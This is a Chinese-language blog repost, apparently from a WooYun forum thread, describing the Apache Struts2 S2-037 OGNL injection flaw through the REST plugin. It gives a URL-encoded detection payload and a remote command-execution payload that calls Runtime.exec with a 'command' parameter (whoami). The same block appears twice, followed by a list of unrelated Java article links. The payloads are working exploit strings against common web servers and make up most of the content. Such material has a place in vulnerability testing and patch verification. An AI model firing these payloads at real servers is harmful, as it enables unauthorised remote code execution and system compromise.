Struts2-037 exp 检测脚本
2016-06-17 10:09
501 查看
from:http://zone.wooyun.org/content/27865
s2-037背景:
漏洞建立在033的基础上,还是对method没有进行过滤导致的,但是033的payload的要做转变才能检测
启用动态调用方法为true
支持rest插件
rest介绍:
使用http://localhost:8080/bee/action-name/1/XXX这种请求方式,其实XXX可以是任何合法的名字
Struts2会查找XXX为名字的方法来调用,比如请求http://localhost:8080/bee/test/1/abc,那么TestAction的public String abc()就会被调用
检测poc:
%28%23_memberAccess%3d@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS%29%3f(%23wr%3d%23context%5b%23parameters.obj%5b0%5d%5d.getWriter(),%23wr.println(%23parameters.content[0]),%23wr.flush(),%23wr.close()):xx.toString.json?&obj=com.opensymphony.xwork2.dispatcher.HttpServletResponse&content=123456789
命令执行:
(%23_memberAccess%3d@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS)%3f(%23wr%3d%23context%5b%23parameters.obj%5b0%5d%5d.getWriter(),%23rs%3d@org.apache.commons.io.IOUtils@toString(@java.lang.Runtime@getRuntime().exec(%23parameters.command[0]).getInputStream()),%23wr.println(%23rs),%23wr.flush(),%23wr.close()):xx.toString.json?&obj=com.opensymphony.xwork2.dispatcher.HttpServletResponse&content=16456&command=whoami
s2-037背景:
漏洞建立在033的基础上,还是对method没有进行过滤导致的,但是033的payload的要做转变才能检测
启用动态调用方法为true
支持rest插件
rest介绍:
使用http://localhost:8080/bee/action-name/1/XXX这种请求方式,其实XXX可以是任何合法的名字
Struts2会查找XXX为名字的方法来调用,比如请求http://localhost:8080/bee/test/1/abc,那么TestAction的public String abc()就会被调用
检测poc:
%28%23_memberAccess%3d@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS%29%3f(%23wr%3d%23context%5b%23parameters.obj%5b0%5d%5d.getWriter(),%23wr.println(%23parameters.content[0]),%23wr.flush(),%23wr.close()):xx.toString.json?&obj=com.opensymphony.xwork2.dispatcher.HttpServletResponse&content=123456789
命令执行:
(%23_memberAccess%3d@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS)%3f(%23wr%3d%23context%5b%23parameters.obj%5b0%5d%5d.getWriter(),%23rs%3d@org.apache.commons.io.IOUtils@toString(@java.lang.Runtime@getRuntime().exec(%23parameters.command[0]).getInputStream()),%23wr.println(%23rs),%23wr.flush(),%23wr.close()):xx.toString.json?&obj=com.opensymphony.xwork2.dispatcher.HttpServletResponse&content=16456&command=whoami
相关文章推荐
- javasisst & JAVA8
- [Java]知乎下巴第0集:让我们一起来做一个知乎爬虫吧哦耶【转】
- Java学习之访问权限Public,Private,Protected,Default的作用域
- java 使用org.w3c.dom操作XML文件
- Java中Lambda表达式的使用
- 基于maven的springMvc+Mybatis,搭建项目的时候发现一些问题这里例举下
- java实现简单五子棋
- 用“逐步排除”的方法定位Java服务线上“系统性”故障
- Spring WebSocket教程(二)
- Eclipse中高亮显示相同的变量
- Spring中@Async用法总结
- Eclipse checkstyle 插件使用简单介绍
- Spring WebSocket教程(一)
- Java调用批处理文件,Runtime.getRuntime().exec参数,示例
- Spring通过构造方法注入的四种方式
- Java nio 文件操作 Path,Files类详解一
- java从控制台输出和String的替换
- spring——控制反转简单例子 (Spring三种注入方式)
- java.util.zip.ZipException: invalid LOC header (bad signature)
- Java基础第十七天总结